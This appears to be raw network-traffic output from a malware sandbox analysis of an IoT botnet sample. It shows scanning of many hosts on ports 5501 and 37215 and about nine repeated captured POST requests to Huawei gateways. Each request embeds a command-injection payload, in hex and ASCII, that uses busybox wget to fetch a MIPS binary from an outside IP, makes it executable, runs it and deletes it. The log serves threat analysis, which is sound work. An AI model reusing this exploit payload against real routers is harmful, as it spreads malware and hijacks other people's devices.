              Source: global trafficTCP traffic: 192.168.2.23:65500 -> 157.14.147.87:5501
              Source: global trafficTCP traffic: 192.168.2.23:65500 -> 178.51.172.178:5501
              Source: global trafficTCP traffic: 192.168.2.23:65500 -> 41.68.77.178:5501
              Source: global trafficTCP traffic: 192.168.2.23:65244 -> 41.211.196.47:37215
              Source: global trafficTCP traffic: 192.168.2.23:65244 -> 41.129.22.1:37215
              Source: global trafficTCP traffic: 192.168.2.23:65244 -> 41.162.89.205:37215
              Source: global trafficTCP traffic: 192.168.2.23:65244 -> 41.245.217.187:37215
              Source: global trafficTCP traffic: 192.168.2.23:65244 -> 41.1.208.53:37215
              Source: global trafficTCP traffic: 192.168.2.23:65244 -> 41.249.195.94:37215
              Source: global trafficTCP traffic: 192.168.2.23:65244 -> 41.232.187.61:37215
              Source: global trafficTCP traffic: 192.168.2.23:65244 -> 41.111.21.94:37215
              Source: global trafficTCP traffic: 192.168.2.23:65244 -> 41.93.167.156:37215
              Source: global trafficTCP traffic: 192.168.2.23:65244 -> 41.255.70.178:37215
              Source: global trafficTCP traffic: 192.168.2.23:65244 -> 41.226.101.233:37215
              Source: global trafficTCP traffic: 192.168.2.23:65244 -> 41.214.48.250:37215
              Source: global trafficTCP traffic: 192.168.2.23:65244 -> 41.236.159.81:37215
              Source: global trafficTCP traffic: 192.168.2.23:65244 -> 41.101.209.162:37215
              Source: global trafficTCP traffic: 192.168.2.23:65244 -> 41.9.58.145:37215
              Source: global trafficTCP traffic: 192.168.2.23:65244 -> 41.131.177.168:37215
              Source: global trafficTCP traffic: 192.168.2.23:65244 -> 41.59.247.70:37215
              Source: global trafficTCP traffic: 192.168.2.23:65244 -> 41.243.228.36:37215
              Source: global trafficTCP traffic: 192.168.2.23:65244 -> 41.28.227.32:37215
              Source: global trafficTCP traffic: 192.168.2.23:65244 -> 41.37.98.120:37215
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 